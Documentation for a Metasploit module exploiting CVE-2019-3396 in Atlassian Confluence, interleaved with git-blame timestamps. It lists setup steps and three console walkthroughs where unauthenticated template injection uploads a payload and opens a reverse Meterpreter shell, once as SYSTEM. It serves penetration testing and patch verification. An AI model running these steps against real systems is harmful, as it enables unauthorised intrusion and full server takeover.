2019-04-11 17:54:10 +03:00
# Description
2019-04-11 17:52:08 +03:00
This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.
The vulnerability exists in the Widget Connector Macro which allow inject the "\_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.
The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
2020-01-16 10:44:35 -05:00
## Vulnerable Application
2019-04-11 17:52:08 +03:00
Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.
2020-01-16 11:46:36 -05:00
## Verification Steps
2019-04-11 17:52:08 +03:00
- [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/confluence_widget_connector`
- [ ] `set RHOST <IP>`
- [ ] `set RPORT <PORT>`
- [ ] `set SRVHOST <HOST_IP>`
- [ ] `check`
- [ ] You should see `The target is vulnerable`
- [ ] `exploit`
- [ ] You should get a meterpreter session.
2020-01-16 10:52:13 -05:00
## Options
2019-04-11 17:52:08 +03:00
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
2019-06-25 12:43:04 -05:00
- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
2019-04-11 17:52:08 +03:00
2020-01-16 11:41:12 -05:00
## Scenarios
2019-04-11 17:54:10 +03:00
## Tested on Confluence 6.8.2 with Windows target
2019-04-11 17:52:08 +03:00
```
2025-07-17 11:51:29 +01:00
msf > use exploit/multi/http/confluence_widget_connector
msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com
2019-04-11 17:52:08 +03:00
RHOST => target.com
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090
2019-04-11 17:52:08 +03:00
RPORT => 8090
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
2019-04-11 17:52:08 +03:00
SRVHOST => 192.168.0.1
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set TARGET Windows
2019-04-11 17:52:08 +03:00
TARGET => Windows
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > check
2019-04-11 17:52:08 +03:00
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > exploit
2019-04-11 17:52:08 +03:00
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) >
2019-04-11 17:52:08 +03:00
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > sessions -i 1
2019-04-11 17:52:08 +03:00
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) >
2019-04-11 17:52:08 +03:00
```
2019-04-11 17:54:10 +03:00
## Tested on Confluence 6.8.2 with Java target
2019-04-11 17:52:08 +03:00
```
2025-07-17 11:51:29 +01:00
msf > use exploit/multi/http/confluence_widget_connector
msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com
2019-04-11 17:52:08 +03:00
RHOST => target.com
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090
2019-04-11 17:52:08 +03:00
RPORT => 8090
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
2019-04-11 17:52:08 +03:00
SRVHOST => 192.168.0.1
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > check
2019-04-11 17:52:08 +03:00
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > exploit
2019-04-11 17:52:08 +03:00
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) >
2019-04-11 17:52:08 +03:00
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > sessions -i 1
2019-04-11 17:52:08 +03:00
[*] Starting interaction with 1...
meterpreter > getuid
2019-04-11 23:39:50 +03:00
Server username: confluence
2019-04-11 17:52:08 +03:00
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) >
2019-04-11 17:52:08 +03:00
```
2019-04-11 17:54:10 +03:00
## Tested on Confluence 6.8.2 with Linux target
2019-04-11 17:52:08 +03:00
```
2025-07-17 11:51:29 +01:00
msf > use exploit/multi/http/confluence_widget_connector
msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com
2019-04-11 17:52:08 +03:00
RHOST => target.com
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090
2019-04-11 17:52:08 +03:00
RPORT => 8090
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
2019-04-11 17:52:08 +03:00
SRVHOST => 192.168.0.1
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > check
2019-04-11 17:52:08 +03:00
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > exploit
2019-04-11 17:52:08 +03:00
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) >
2019-04-11 17:52:08 +03:00
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) > sessions -i 1
2019-04-11 17:52:08 +03:00
[*] Starting interaction with 1...
meterpreter > getuid
2019-04-11 23:39:50 +03:00
Server username: uid=1001, gid=1001, euid=1001, egid=1001
2019-04-11 17:52:08 +03:00
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
2025-07-17 11:51:29 +01:00
msf exploit(multi/http/confluence_widget_connector) >
2019-06-25 12:43:04 -05:00
```
